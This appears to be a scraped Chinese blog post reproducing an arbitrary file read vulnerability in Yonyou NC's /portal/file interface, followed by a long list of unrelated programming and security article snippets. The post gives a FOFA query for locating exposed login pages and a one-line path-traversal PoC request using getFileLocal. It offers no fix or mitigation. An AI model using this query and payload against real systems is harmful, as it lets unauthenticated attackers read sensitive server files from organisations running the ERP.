OidBoy_G
OidBoy_G

用友NC portal/file 任意文件读取漏洞复现

0x01 产品简介

用友NC是一款企业级ERP软件。作为一种信息化管理工具,用友NC提供了一系列业务管理模块,包括财务会计、采购管理、销售管理、物料管理、生产计划和人力资源管理等,帮助企业实现数字化转型和高效管理。

0x02 漏洞概述

用友NC 系统 /portal/file等接口存在任意文件读取漏洞,未经身份认证的攻击者可以通过此漏洞获取敏感信息,使系统处于极不安全状态。

0x03 复现环境

FOFA:app="用友-UFIDA-NC" && title=="产品登录界面"

用友NC portal/file 任意文件读取漏洞复现_第1张图片

0x04 漏洞复现

PoC

GET /portal/file?cmd=getFileLocal&fileid=..%2F..%2F..%2F..%2Fwebapps/

你可能感兴趣的:(漏洞复现,安全,web安全)

  • 内容中台的核心架构是什么? 清风徐徐de来 其他
    模块化架构设计解析内容中台的模块化架构通过分层解耦实现灵活扩展,其核心由基础资源层、能力服务层与业务应用层构成。基础层以统一数据治理体系为支撑,通过标准化接口实现结构化与非结构化数据的统一存储,例如Baklib采用分布式存储架构保障数据安全性与访问效率。服务层整合智能分发引擎与API协同策略,支持动态编排内容处理流程,如自动标签生成与多版本管理。应用层通过可配置化组件对接多终端场景,确保知识库构建
  • 如何解决网站风险提示 安全
    当平时访问某个网站时,如果发现浏览器地址栏显示“不安全”警告,这通常意味着该网站可能存在安全风险或SSL证书配置不当。以下是一些简单易懂、快速有效的解决方案。一、检查并更新SSL证书确认HTTPS协议:打开您的浏览器,访问目标网站。检查网址是否以“https”开头。如果不是,说明该网站未使用SSL加密,需要启用HTTPS协议。验证SSL证书:如果网址以“https”开头,但浏览器仍显示“不安全”,
  • 从零开始学习黑客技术,看这一篇就够了 网络安全-旭师兄 学习web安全python密码学网络安全
    基于入门网络安全/黑客打造的:黑客&网络安全入门&进阶学习资源包黑客,对于很多人来说,是一个神秘的代名词,加之影视作品夸张的艺术表现,使得黑客这个本来只专注于技术的群体,散发出亦正亦邪的神秘色彩。黑客源自英文hacker一词,最初曾指热心于计算机技术、水平高超的电脑高手,尤其是程序设计人员,逐渐区分为白帽、灰帽、黑帽等。其中,白帽黑客被称为道德黑客。他们不会非法入侵用户网络,而是通过一系列测试检查
  • 七个合法学习黑客技术的平台,让你从萌新成为大佬 黑客白帽子黑爷 学习php开发语言web安全网络
    1、HackThisSite提供在线IRC聊天和论坛,让用户交流更加方便。网站涵盖多种主题,包括密码破解、网络侦察、漏洞利用、社会工程学等。非常适用于个人提高网络安全技能2、HackaDay涵盖多个领域,包括黑客技术、科技、工程和DIY等内容,站内提供大量有趣的文章、视频、教程和新闻,帮助用户掌握黑客技术和DIY精神。3、OffensiveSecurity一个专门提供网络安全培训和认证的公司,课程
  • PHP 过滤器 wjs2024 开发语言
    PHP过滤器概述PHP过滤器是一种强大的功能,它可以确保在应用程序中处理数据时的安全性。过滤器可以用来验证用户输入、清理数据、转换数据等。在PHP开发中,正确地使用过滤器可以显著减少安全漏洞,提高应用程序的可靠性。过滤器的分类PHP中主要的过滤器分为以下几类:数据验证数据清理数据转换1.数据验证数据验证过滤器确保用户输入的数据符合特定的格式和规则。例如,filter_var函数可以用来验证电子邮件
  • MySQL进阶—— 视图(详解) 1加1等于 MySQLsqlmysql
    本文全面介绍Mysql视图相关的核心知识。包括介绍视图定义,基于查询结果的虚拟表,有简化查询、保障安全、解耦逻辑等作用。讲解创建、修改、删除视图的操作,以及及视图可更新条件、安全性控制及性能优化方法。本文目录一、视图的定义与作用定义作用二、视图的创建与管理创建视图修改视图方式1:覆盖原有视图方式2:ALTERVIEW删除视图三、视图两种算法MERGE(默认)TEMPTABLE四、视图的可更新性可更
  • 《C#多播委托:深入解析核心机制与实战应用指南》 Ro小陌 C#WindowsJavac#windowsjava
    在C#中,多播委托(MulticastDelegate)是一种可以引用多个方法的委托类型,它允许将多个方法绑定到同一个委托实例上,并通过一次调用触发所有方法的执行。这是事件处理机制的核心实现基础。以下从底层机制到实际应用详细解析:一、委托基础委托的本质委托是类型安全的函数指针,继承自System.MulticastDelegate类。每个委托实例内部维护一个调用列表(InvocationList)
  • mitmproxy配合Wireshark 抓包分析 自由鬼 安全IT应用探讨运维技术wireshark测试工具网络网络安全运维服务器
    Mitmproxy是一款非常强大的交互式HTTP代理工具,它被广泛应用于Web开发、API调试、安全测试等领域。与Wireshark侧重于被动监听网络流量不同,Mitmproxy更像一个主动的中间人,可以拦截、检查、修改和重放HTTP/HTTPS流量,让你能够更深入地理解和控制你的网络通信。一、什么是mitmproxy?Mitmproxy是一个自由且开源的交互式TLS拦截代理。“中间人(Man-i
  • PIPCA个人信息保护合规审计师认证介绍! 熙丫 13381482386 大数据
    个人信息保护合规审计师"(PersonalInformationProtectionComplianceAuditor-CCRC)是中国网络安全审查认证中心与市场监管大数据中心为深入贯彻实施《个人信息保护法》,推动个人信息处理者切实履行合规审计职责,针对企事业单位及第三方机构中从事个人信息保护合规审计(简称“个保审计”)的专业人员,依据《个人信息保护法》、《网络安全从业人员能力基本要求》
  • 公司共享网盘怎么建立 网盘
    公司共享网盘的建立,关键在于明确使用需求、选择合适的网盘服务、搭建统一的文件管理规范、做好权限分级与安全防护。尤其要强调选择合适的网盘服务这一点,如果企业规模较大,且对协同办公的需求强烈,就需要考虑支持多人实时协作、稳定高效的专业网盘。例如采用可以快速部署与灵活扩展的企业网盘方案,不仅能在初期节省大量时间成本,也能保障未来业务扩展不受限制,从而让文档共享与团队协作更加顺畅。一、公司共享网盘的基本概
  • ELK安装配置 hu_wenjie OpsDevOpsDev运维开发
    ELK平台介绍日志主要包括系统日志、应用程序日志和安全日志。系统运维和开发人员可以通过日志了解服务器软硬件信息、检查配置过程中的错误及错误发生的原因。经常分析日志可以了解服务器的负荷,性能安全性,从而及时采取措施纠正错误。
  • Java常用集合与映射的线程安全问题深度解析 yang789022 编程学习java安全python
    Java常用集合与映射的线程安全问题深度解析一、线程安全基础认知二、典型非线程安全集合问题分析1.ArrayList的并发陷阱2.HashMap的并发灾难3.HashSet的隐藏风险三、线程安全解决方案对比1.同步包装方案2.传统线程安全集合3.现代并发容器(java.util.concurrent包)3.1CopyOnWriteArrayList3.2ConcurrentHashMap3.3Co
  • 2025年渗透测试面试题总结-长某亭科技-安全服务工程师(一面)(题目+回答) 独行soc 2025年渗透测试面试指南面试职场和发展安全红蓝攻防护网2025科技
    网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。目录长某亭科技-安全服务工程师(一面)1.SQL注入原理与代码层面成因原理代码层面成因漏洞触发场景2.XSS漏洞原理(代码层面)原理代码层面成因漏洞触发场景3.OWASPTop10漏洞(2023版)4.SQL注入防御方案5.SQL注入绕过防护6.护网行动工作内容7.学校攻
  • 2025年渗透测试面试题总结-快某手-安全实习生(一面、二面)(题目+回答) 独行soc 2025年渗透测试面试指南安全科技网络面试护网2015年
    网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。目录快某手-安全实习生一面一、Linux操作:查看进程PID的5种方法二、Elasticsearch(ES)核心要点三、HTTPS建立过程(TLS1.3优化版)四、Python内存管理机制五、深拷贝与浅拷贝对比六、Python多线程局限性七、XSS防御方案八、SQL注入防
  • 最新网络安全-跨站脚本攻击(XSS)的原理、攻击及防御_xsstrike原理 2401_84239830 程序员web安全xss安全
    XSS的类型反射型XSS/不持久型XSS存储型XSS/持久型XSS基于DOM的XSS常用Payload与工具XSS扫描工具Payloadsscript标签类结合js的html标签伪协议绕过危害防御简介跨站脚本攻击(全称CrossSiteScripting,为和CSS(层叠样式表)区分,简称为XSS)是指恶意攻击者在Web页面中插入恶意javascript代码(也可能包含html代码),当用户浏览网
  • 网络安全知识:网络安全网格架构 网络安全(king) 网络工程师网络安全黑客web安全架构安全
    在数字化转型的主导下,大多数组织利用多云或混合环境,包括本地基础设施、云服务和应用程序以及第三方实体,以及在网络中运行的用户和设备身份。在这种情况下,保护组织资产免受威胁涉及实现一个统一的框架,该框架根据组织内每个实体的上下文提供安全性。此外,强化组合环境需要可互操作的跨域功能,以增强协作,这样就不需要多个解决方案来实现相同的功能。在这种情况下,网络安全网格架构(CSMA)提供了一种可扩展的方法来
  • Java 基础核心总结 仅此而已丶 Java基础教程系列开发语言java
    目录前言介绍1、基本语法2、面向对象编程3、异常处理4、集合框架5、IO流6、多线程专栏地址前言Java是一种广泛使用的程序设计语言,具有跨平台、面向对象、安全性高、灵活性强等特点,广泛应用于企业级应用程序和移动应用程序等领域。在学习Java语言时,需要掌握一些基础核心知识,本文将为您总结Java基础核心知识点,以便于您的学习和参考。介绍Java基础核心知识点包括基本语法、面向对象编程、异常处理、
  • Flutter开发:使用SafeArea(安全区域) 三掌柜666 Flutter开发flutter安全ios
    前言在Flutter开发中,对于各种手机机型的适配是一个非常重要的事情,尤其是Android系统的机型太多太杂,适配起来不是易事,而且对于iOS系统的iPhone手机的“刘海”适配也是关键的一个知识点。那么本篇博文就来分享一下关于SafeArea的使用,SafeArea也是各种稀奇古怪不规则的屏幕适配的最佳利器,方便查阅使用。原理SafeArea是通过MediaQuery来检测屏幕尺寸,让应用程序
  • localhost 已拒绝连接。 滚菩提哦呢 服务器网络linux运维
    "localhost已拒绝连接"是一个计算机网络错误提示,表示你的本地计算机尝试连接到本地服务器上的某个应用程序,但连接被服务器拒绝了。这种错误通常出现在以下几种情况下:服务器没有启动或者应用程序没有在服务器上运行。服务器上的应用程序正在使用不同的端口,而你尝试连接的端口不正确。防火墙或其他安全软件阻止了你的连接。你输入的URL有误,无法正确识别要连接的服务器。解决此问题的方法包括检查服务器是否启
  • Android Retrofit 框架注解定义与解析模块深度剖析(一) &有梦想的咸鱼& AndroidRetrofit原理androidretrofit
    一、引言在现代Android和Java开发中,网络请求是不可或缺的一部分。Retrofit作为Square公司开源的一款强大的类型安全的HTTP客户端,凭借其简洁易用的API和高效的性能,在开发者社区中广受欢迎。Retrofit的核心特性之一便是通过注解来定义HTTP请求,这种方式使得代码更加清晰、易读且易于维护。本文将深入Retrofit框架的源码,对其注解定义与解析模块进行全面且细致的分析,揭
  • InnoDB和MyISAM bobo306 mysql-面试题mysql数据库java
    InnoDB和MyISAM是使用MySQL时最常用的两种引擎类型,我们重点来看下两者区别。事务和外键InnoDB支持事务和外键,具有安全性和完整性,适合大量insert或update操作MyISAM不支持事务和外键,它提供高速存储和检索,适合大量的select查询操作锁机制InnoDB支持行级锁,锁定指定记录。基于索引来加锁实现。MyISAM支持表级锁,锁定整张表。索引结构InnoDB使用聚集索引
  • 面向对象的三大特性? 毛小茛 Java面试知识点java
    面向对象的三大特性?封装定义与目的将数据和操作这些数据的方法绑定在一起,形成一个类,并通过访问控制机制限制外部对类内部数据和方法的直接访问。保护数据的安全性和完整性,避免外部代码随意修改内部数据,同时提高代码的可维护性和可扩展性。实现方法使用访问修饰符(如private、protected、public)来控制类成员的访问权限访问修饰符谁可以访问private类自身protected类自身+子类p
  • 智能化工具助力施工安全监测:开启高效、精准的安全管理新时代 inscode_046
    智能化工具助力施工安全监测:开启高效、精准的安全管理新时代最新接入DeepSeek-V3模型,点击下载最新版本InsCodeAIIDE引言在建筑行业中,施工安全一直是重中之重。随着科技的飞速发展,智能化工具的应用为施工安全监测带来了前所未有的变革。通过引入先进的AI技术,施工安全管理不仅变得更加高效和精准,还能显著降低事故发生率。本文将探讨如何利用智能化工具提升施工安全监测水平,并介绍一款能够极大
  • 1433抓鸡工具_1433抓鸡工具在软件安全测试中的重要性及应用 网络安全(king) 网络工程师网络安全黑客web安全网络安全前端服务器
    在信息安全领域,“1433抓鸡工具”这一术语往往与网络安全测试紧密相关。虽然名字听起来有些戏谑,但这类工具在软件安全评估和渗透测试中扮演着重要角色。本文将从软考的角度出发,探讨1433抓鸡工具的基本概念、使用场景及其在软件安全中的作用。一、1433抓鸡工具概述1433抓鸡工具,通常指的是一类网络安全测试工具,用于检测网络系统中的潜在漏洞。这类工具能够模拟黑客的攻击行为,帮助安全专家发现系统可能存在
  • 计算机视觉|3D 点云处理黑科技:PointNet++ 原理剖析与实战指南 紫雾凌寒 AI炼金厂#深度学习#计算机视觉深度学习计算机视觉3dcnnPointNet++3d云3d云数据
    一、引言在当今数字化与智能化快速发展的时代,3D点云处理技术在多个前沿领域中发挥着重要作用。特别是在自动驾驶和机器人视觉等领域,这项技术已成为实现智能化的关键支撑。以自动驾驶为例,车辆需要实时感知周围复杂的环境信息,包括行人、车辆、交通标志和路况等。3D点云数据能够提供高精度的三维空间信息,使自动驾驶车辆更准确地识别和定位周围物体,从而做出安全、合理的行驶决策。在城市街道上,自动驾驶车辆通过3D点
  • 基于java的搜索引擎系统设计与实现 助力毕业 搜索引擎java数据库
    基于java的搜索引擎系统设计与实现I.引言A.研究背景和动机基于Java的搜索引擎系统设计与实现的研究背景和动机是构建一个高效、准确、安全的搜索引擎系统。随着互联网的普及,搜索引擎已经成为了人们获取信息的主要方式之一。但是,现有的搜索引擎系统还存在一些问题,比如搜索结果的准确性、搜索速度的快慢、搜索结果的可靠性等。为了解决这些问题,需要开发一个高效、准确、安全的搜索引擎系统。本文将介绍基于Jav
  • Android 加解密算法工具类封装:AES、RSA、MD5 一站式解决方案 tangweiguo03051987 android算法AESDESMD5JAVA
    在Android开发中,数据的安全性非常重要,尤其是敏感数据的存储和传输。为了实现数据加密和解密,我们可以封装一个通用的加解密工具类,支持常见的加密算法(如AES、RSA、DES等)。以下是一个基于AES对称加密算法的工具类封装示例,同时提供扩展性以支持其他算法。AES加解密工具类封装AES(AdvancedEncryptionStandard)是一种对称加密算法,加密和解密使用相同的密钥。以下是
  • 鸿蒙全栈开发 D2 GH小杨 harmonyos华为
    课程目标掌握ArkTS基础语法与核心概念理解声明式UI开发范式能独立开发简单鸿蒙应用组件建立规范的代码编写习惯第一部分:初识ArkTS1.1语言全景认知JavaScriptTypeScriptArkTS鸿蒙生态手机平板智能穿戴关键特征解析:类型安全:编译时检查错误(演示类型错误案例)UI即代码:通过代码直接描述界面(对比传统XML布局)一次开发:同一套代码适配不同设备尺寸1.2开发环境初体验Dev
  • 氢能源汽车使用过程中的氢气监测技术:量子电导氢气传感器的引领 德克西尔DrKsir 氢气传感器能源汽车
    一、引言随着氢能源汽车的不断发展,其安全性成为人们关注的焦点。氢气作为一种易燃易爆的气体,其在车辆内部和外部的浓度监测至关重要。本文将探讨车辆使用过程中氢气水平监测的技术手段,特别是量子电导氢气传感器的应用,以及系统架构和实际应用案例,旨在确保在任何使用条件下都能保持安全。二、氢气监测的重要性氢燃料电池汽车以其高效、环保的特点成为未来汽车发展的重要方向。然而,氢气的易燃易爆特性使得对其浓度的实时监
  • Synology 部署的 WordPress 無法升級至最新版本時,可以透過以下改良版指南進行排查和解決。 蠟筆小新工程師 synologywordpress
    當Synology部署的WordPress無法升級至最新版本時,可以透過以下改良版指南進行排查和解決。我對內容進行了補充和重新組織,希望能幫助你更高效地處理這類問題:權限相關問題處理檢查文件和目錄權限:確保WordPress安裝目錄內的目錄權限設置為755,文件權限設置為664。特殊文件wp-config.php權限應設置為600,以加強安全性。可以使用以下命令在終端中修改:bashchmod-R
  • Enum 枚举 120153216 enum枚举
    原文地址:http://www.cnblogs.com/Kavlez/p/4268601.html Enumeration 于Java 1.5增加的enum type...enum type是由一组固定的常量组成的类型,比如四个季节、扑克花色。在出现enum type之前,通常用一组int常量表示枚举类型。比如这样: public static final int APPLE_FUJI = 0
  • Java8简明教程 bijian1013 javajdk1.8
            Java 8已于2014年3月18日正式发布了,新版本带来了诸多改进,包括Lambda表达式、Streams、日期时间API等等。本文就带你领略Java 8的全新特性。  一.允许在接口中有默认方法实现         Java 8 允许我们使用default关键字,为接口声明添
  • Oracle表维护 快速备份删除数据 cuisuqiang oracle索引快速备份删除
    我知道oracle表分区,不过那是数据库设计阶段的事情,目前是远水解不了近渴。 当前的数据库表,要求保留一个月数据,且表存在大量录入更新,不存在程序删除。 为了解决频繁查询和更新的瓶颈,我在oracle内根据需要创建了索引。但是随着数据量的增加,一个半月数据就要超千万,此时就算有索引,对高并发的查询和更新来说,让然有所拖累。 为了解决这个问题,我一般一个月会进行一次数据库维护,主要工作就是备
  • java多态内存分析 麦田的设计者 java内存分析多态原理接口和抽象类
          “  时针如果可以回头,熟悉那张脸,重温嬉戏这乐园,墙壁的松脱涂鸦已经褪色才明白存在的价值归于记忆。街角小店尚存在吗?这大时代会不会牵挂,过去现在花开怎么会等待。       但有种意外不管痛不痛都有伤害,光阴远远离开,那笑声徘徊与脑海。但这一秒可笑不再可爱,当天心
  • Xshell实现Windows上传文件到Linux主机 被触发 windows
    经常有这样的需求,我们在Windows下载的软件包,如何上传到远程Linux主机上?还有如何从Linux主机下载软件包到Windows下;之前我的做法现在看来好笨好繁琐,不过也达到了目的,笨人有本方法嘛; 我是怎么操作的: 1、打开一台本地Linux虚拟机,使用mount 挂载Windows的共享文件夹到Linux上,然后拷贝数据到Linux虚拟机里面;(经常第一步都不顺利,无法挂载Windo
  • 类的加载ClassLoader 肆无忌惮_ ClassLoader
    类加载器ClassLoader是用来将java的类加载到虚拟机中,类加载器负责读取class字节文件到内存中,并将它转为Class的对象(类对象),通过此实例的 newInstance()方法就可以创建出该类的一个对象。   其中重要的方法为findClass(String name)。   如何写一个自己的类加载器呢? 首先写一个便于测试的类Student
  • html5写的玫瑰花 知了ing html5
    <html> <head> <title>I Love You!</title> <meta charset="utf-8" /> </head> <body> <canvas id="c"></canvas>
  • google的ConcurrentLinkedHashmap源代码解析 矮蛋蛋 LRU
    原文地址: http://janeky.iteye.com/blog/1534352 简述 ConcurrentLinkedHashMap 是google团队提供的一个容器。它有什么用呢?其实它本身是对 ConcurrentHashMap的封装,可以用来实现一个基于LRU策略的缓存。详细介绍可以参见 http://code.google.com/p/concurrentlinke
  • webservice获取访问服务的ip地址 alleni123 webservice
    1. 首先注入javax.xml.ws.WebServiceContext, @Resource private WebServiceContext context; 2. 在方法中获取交换请求的对象。 javax.xml.ws.handler.MessageContext mc=context.getMessageContext(); com.sun.net.http
  • 菜鸟的java基础提升之道——————>是否值得拥有 百合不是茶
    1,c++,java是面向对象编程的语言,将万事万物都看成是对象;java做一件事情关注的是人物,java是c++继承过来的,java没有直接更改地址的权限但是可以通过引用来传值操作地址,java也没有c++中繁琐的操作,java以其优越的可移植型,平台的安全型,高效性赢得了广泛的认同,全世界越来越多的人去学习java,我也是其中的一员      java组成:
  • 通过修改Linux服务自动启动指定应用程序 bijian1013 linux
    Linux中修改系统服务的命令是chkconfig (check config),命令的详细解释如下: chkconfig 功能说明:检查,设置系统的各种服务。 语  法:chkconfig [ -- add][ -- del][ -- list][系统服务] 或 chkconfig [ -- level  <</SPAN>
  • spring拦截器的一个简单实例 bijian1013 javaspring拦截器Interceptor
    Purview接口 package aop; public interface Purview { void checkLogin(); } Purview接口的实现类PurviesImpl.java package aop; public class PurviewImpl implements Purview { public void check
  • [Velocity二]自定义Velocity指令 bit1129 velocity
    什么是Velocity指令 在Velocity中,#set,#if, #foreach, #elseif, #parse等,以#开头的称之为指令,Velocity内置的这些指令可以用来做赋值,条件判断,循环控制等脚本语言必备的逻辑控制等语句,Velocity的指令是可扩展的,即用户可以根据实际的需要自定义Velocity指令   自定义指令(Directive)的一般步骤 &nbs
  • 【Hive十】Programming Hive学习笔记 bit1129 programming
    第二章 Getting Started 1.Hive最大的局限性是什么?一是不支持行级别的增删改(insert, delete, update)二是查询性能非常差(基于Hadoop MapReduce),不适合延迟小的交互式任务三是不支持事务2. Hive MetaStore是干什么的?Hive persists table schemas and other system metadata.
  • nginx有选择性进行限制 ronin47 nginx 动静 限制
    http { limit_conn_zone $binary_remote_addr zone=addr:10m; limit_req_zone $binary_remote_addr zone=one:10m rate=5r/s;... server {... location ~.*\.(gif|png|css|js|icon)$ {
  • java-4.-在二元树中找出和为某一值的所有路径 . bylijinnan java
    /* * 0.use a TwoWayLinkedList to store the path.when the node can't be path,you should/can delete it. * 1.curSum==exceptedSum:if the lastNode is TreeNode,printPath();delete the node otherwise
  • Netty学习笔记 bylijinnan javanetty
    本文是阅读以下两篇文章时: http://seeallhearall.blogspot.com/2012/05/netty-tutorial-part-1-introduction-to.html http://seeallhearall.blogspot.com/2012/06/netty-tutorial-part-15-on-channel.html 我的一些笔记 ===
  • js获取项目路径 cngolon js
    //js获取项目根路径,如: http://localhost:8083/uimcardprj function getRootPath(){     //获取当前网址,如: http://localhost:8083/uimcardprj/share/meun.jsp     var curWwwPath=window.document.locati
  • oracle 的性能优化 cuishikuan oracleSQL Server
       在网上搜索了一些Oracle性能优化的文章,为了更加深层次的巩固[边写边记],也为了可以随时查看,所以发表这篇文章。     1.ORACLE采用自下而上的顺序解析WHERE子句,根据这个原理,表之间的连接必须写在其他WHERE条件之前,那些可以过滤掉最大数量记录的条件必须写在WHERE子句的末尾。(这点本人曾经做过实例验证过,的确如此哦!
  • Shell变量和数组使用详解 daizj linuxshell变量数组
    Shell 变量 定义变量时,变量名不加美元符号($,PHP语言中变量需要),如: your_name="w3cschool.cc" 注意,变量名和等号之间不能有空格,这可能和你熟悉的所有编程语言都不一样。同时,变量名的命名须遵循如下规则: 首个字符必须为字母(a-z,A-Z)。 中间不能有空格,可以使用下划线(_)。 不能使用标点符号。 不能使用ba
  • 编程中的一些概念,KISS、DRY、MVC、OOP、REST dcj3sjt126com REST
    KISS、DRY、MVC、OOP、REST (1)KISS是指Keep It Simple,Stupid(摘自wikipedia),指设计时要坚持简约原则,避免不必要的复杂化。 (2)DRY是指Don't Repeat Yourself(摘自wikipedia),特指在程序设计以及计算中避免重复代码,因为这样会降低灵活性、简洁性,并且可能导致代码之间的矛盾。 (3)OOP 即Object-Orie
  • [Android]设置Activity为全屏显示的两种方法 dcj3sjt126com Activity
    1. 方法1:AndroidManifest.xml 里,Activity的 android:theme  指定为" @android:style/Theme.NoTitleBar.Fullscreen" 示例:   <application      
  • solrcloud 部署方式比较 eksliang solrCloud
    solrcloud 的部署其实有两种方式可选,那么我们在实践开发中应该怎样选择呢? 第一种:当启动solr服务器时,内嵌的启动一个Zookeeper服务器,然后将这些内嵌的Zookeeper服务器组成一个集群。  第二种:将Zookeeper服务器独立的配置一个集群,然后将solr交给Zookeeper进行管理   谈谈第一种:每启动一个solr服务器就内嵌的启动一个Zoo
  • Java synchronized关键字详解 gqdy365 synchronized
    转载自:http://www.cnblogs.com/mengdd/archive/2013/02/16/2913806.html 多线程的同步机制对资源进行加锁,使得在同一个时间,只有一个线程可以进行操作,同步用以解决多个线程同时访问时可能出现的问题。 同步机制可以使用synchronized关键字实现。 当synchronized关键字修饰一个方法的时候,该方法叫做同步方法。 当s
  • js实现登录时记住用户名 hw1287789687 记住我记住密码cookie记住用户名记住账号
    在页面中如何获取cookie值呢? 如果是JSP的话,可以通过servlet的对象request 获取cookie,可以 参考:http://hw1287789687.iteye.com/blog/2050040 如果要求登录页面是html呢?html页面中如何获取cookie呢? 直接上代码了 页面:loginInput.html 代码: <!DOCTYPE html PUB
  • 开发者必备的 Chrome 扩展 justjavac chrome
    Firebug:不用多介绍了吧https://chrome.google.com/webstore/detail/bmagokdooijbeehmkpknfglimnifench ChromeSnifferPlus:Chrome 探测器,可以探测正在使用的开源软件或者 js 类库https://chrome.google.com/webstore/detail/chrome-sniffer-pl
  • 算法机试题 李亚飞 java算法机试题
           在面试机试时,遇到一个算法题,当时没能写出来,最后是同学帮忙解决的。        这道题大致意思是:输入一个数,比如4,。这时会输出:           &n
  • 正确配置Linux系统ulimit值 字符串 ulimit
    在Linux下面部 署应用的时候,有时候会遇上Socket/File: Can’t open so many files的问题;这个值也会影响服务器的最大并发数,其实Linux是有文件句柄限制的,而且Linux默认不是很高,一般都是1024,生产服务器用 其实很容易就达到这个数量。下面说的是,如何通过正解配置来改正这个系统默认值。因为这个问题是我配置Nginx+php5时遇到了,所以我将这篇归纳进
  • hibernate调用返回游标的存储过程 Supanccy2013 javaDAOoracleHibernatejdbc
    注:原创作品,转载请注明出处。     上篇博文介绍的是hibernate调用返回单值的存储过程,本片博文说的是hibernate调用返回游标的存储过程。     此此扁博文的存储过程的功能相当于是jdbc调用select 的作用。 1,创建oracle中的包,并在该包中创建的游标类型。 ---创建oracle的程
  • Spring 4.2新特性-更简单的Application Event wiselyman application
    1.1 Application Event Spring 4.1的写法请参考10点睛Spring4.1-Application Event 请对比10点睛Spring4.1-Application Event 使用一个@EventListener取代了实现ApplicationListener接口,使耦合度降低; 1.2 示例 包依赖 <p
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他